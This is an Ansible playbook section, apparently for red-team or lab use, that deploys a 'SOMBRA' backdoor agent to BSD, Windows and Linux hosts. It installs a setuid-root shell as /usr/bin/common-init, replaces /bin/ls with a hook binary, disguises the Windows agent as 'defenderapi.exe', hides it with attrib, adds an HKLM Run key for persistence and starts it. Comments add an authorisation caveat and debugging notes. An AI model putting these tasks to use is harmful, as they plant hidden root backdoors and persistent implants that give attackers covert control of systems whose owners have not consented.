######################################################################
#
# BSD Boxes
#
# Every platform section below stages the SOMBRA agent in the same way:
# a setuid-root shell is installed as /usr/bin/common-init, the real ls
# is preserved as /usr/bin/list, and /bin/ls is replaced by a hook file
# (its contents live in ls-bsd / ls, not in this task list). These tasks
# overwrite system binaries on the target — run them only against hosts
# you are authorised to operate on (lab or scoped engagement).
#
######################################################################
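# Install the SOMBRA shell as a setuid-root binary. File modes must be quoted
# octal strings: an unquoted `4755` reaches the copy module as the decimal
# integer 4755 and is applied verbatim (0o11223), not as setuid 4755.
- name: SOMBRA | Install shell | BSD
  copy:
    src: sombra-bsd
    dest: /usr/bin/common-init
    mode: '4755'
  when: ansible_os_family == 'FreeBSD'

# Keep the genuine ls reachable as /usr/bin/list before /bin/ls is replaced.
# With remote_src the copy module does not carry the source mode over; without
# an explicit mode the new file gets the umask default (typically 0644) and
# is not executable, so the original mode is preserved explicitly.
- name: SOMBRA | Move ls | BSD
  copy:
    remote_src: true
    src: /bin/ls
    dest: /usr/bin/list
    mode: preserve
  when: ansible_os_family == 'FreeBSD'

# Replace /bin/ls with the hook. Presumably the hook delegates to
# /usr/bin/list for ordinary listings — verify against ls-bsd.
- name: SOMBRA | Copy ls hook | pfSense
  copy:
    src: ls-bsd
    dest: /bin/ls
    mode: '0755'
  when: ansible_os_family == 'FreeBSD'

# First invocation of the hook. command: is sufficient here — no shell
# features (pipes, redirects, globbing) are used.
- name: SOMBRA | Init Shell | pfSense
  command: /bin/ls
  when: ansible_os_family == 'FreeBSD'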
######################################################################
#
# Windows Boxes
#
######################################################################
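# Stage the Win10Pcap installer. `copy` is a Python module and does not run on
# a WinRM-managed host; `win_copy` is its Windows counterpart. Paths are
# single-quoted so the backslashes are literal (the double-quoted form needs
# them doubled; the original mixed both styles).
- name: SOMBRA | Copy Win10Pcap MSI | Windows
  win_copy:
    src: win10pcap.msi
    dest: 'C:\ProgramData\win10pcap.msi'
  when: ansible_os_family == 'Windows'

# The two package tasks were missing the OS guard: win_* modules are
# PowerShell and fail outright when a Linux/BSD host reaches them.
- name: SOMBRA | Install Win10Pcap | Windows
  win_package:
    path: 'C:\ProgramData\win10pcap.msi'
    arguments: 'ALLUSERS=1 /quiet'
    state: present
  when: ansible_os_family == 'Windows'

- name: SOMBRA | Delete Win10Pcap MSI | Windows
  win_file:
    path: 'C:\ProgramData\win10pcap.msi'
    state: absent
  when: ansible_os_family == 'Windows'

- name: SOMBRA | Copy shell | Windows
  win_copy:
    src: sombra.exe
    dest: 'C:\ProgramData\defenderapi.exe'
  when: ansible_os_family == 'Windows'

# win_command does not go through a shell, so the path is double-quoted: the
# C runtime strips those before attrib sees the argument. With the original
# single quotes attrib most likely received them literally and could not find
# the file — verify on a target.
- name: SOMBRA | Hide shell | Windows
  win_command: 'attrib +h "C:\ProgramData\defenderapi.exe"'
  when: ansible_os_family == 'Windows'

# Machine-wide Run key (HKLM): the agent is started at user logon.
- name: SOMBRA | Add run key persistence | Windows
  win_regedit:
    path: 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
    name: defender
    data: 'C:\ProgramData\defenderapi.exe'
    type: string
  when: ansible_os_family == 'Windows'

# Fire-and-forget start (async with poll 0, so Ansible does not wait for the
# process). runas /trustlevel:0x20000 launches it as a basic, non-elevated
# user.
- name: SOMBRA | Run agent | Windows
  win_shell: 'runas /trustlevel:0x20000 defenderapi.exe'
  async: 45
  poll: 0
  args:
    chdir: 'C:\ProgramData'
  when: ansible_os_family == 'Windows'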
######################################################################
#
# Linux Boxes
#
######################################################################
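# Names treated as "Linux" by the guards below. The module was misspelled
# `set_facts`, which does not exist and aborts the play at this task. Most
# entries are ansible_distribution values rather than ansible_os_family
# values (Ubuntu's family is "Debian", CentOS's is "RedHat"); they are kept
# for compatibility. "Suse" is added because that is the real family value
# for SLES/openSUSE — the original only listed "SUSE", so those hosts were
# silently skipped. `when: ansible_system == 'Linux'` would be a simpler and
# more complete guard.
- name: SOMBRA | Define Linux Distros
  set_fact:
    linux_distros:
      - RedHat
      - CentOS
      - Fedora
      - Scientific
      - CloudLinux
      - OracleLinux
      - Amazon
      - XenServer
      - Debian
      - Ubuntu
      - SUSE
      - Suse
      - SLED
      - SLES
      - Gentoo
      - Archlinux
      - Mandrake
      - Alpine

# Install the SOMBRA shell as a setuid-root binary. Modes are quoted octal
# strings: an unquoted `4755` is the decimal integer 4755 and is applied
# verbatim (0o11223), not as setuid 4755.
- name: SOMBRA | Install shell | Linux
  copy:
    src: sombra
    dest: /usr/bin/common-init
    mode: '4755'
  when: ansible_os_family in linux_distros

# Keep the genuine ls reachable as /usr/bin/list before /bin/ls is replaced.
# With remote_src the copy module does not carry the source mode over; without
# an explicit mode the new file gets the umask default (typically 0644) and
# is not executable, so the original mode is preserved explicitly.
- name: SOMBRA | Move ls | Linux
  copy:
    remote_src: true
    src: /bin/ls
    dest: /usr/bin/list
    mode: preserve
  when: ansible_os_family in linux_distros

# Replace /bin/ls with the hook. Presumably the hook delegates to
# /usr/bin/list for ordinary listings — verify against the `ls` source file.
- name: SOMBRA | Copy ls hook | Linux
  copy:
    src: ls
    dest: /bin/ls
    mode: '0755'
  when: ansible_os_family in linux_distros

# First invocation of the hook. command: is sufficient — no shell features
# are used.
- name: SOMBRA | Init Shell | Linux
  command: /bin/ls
  when: ansible_os_family in linux_distros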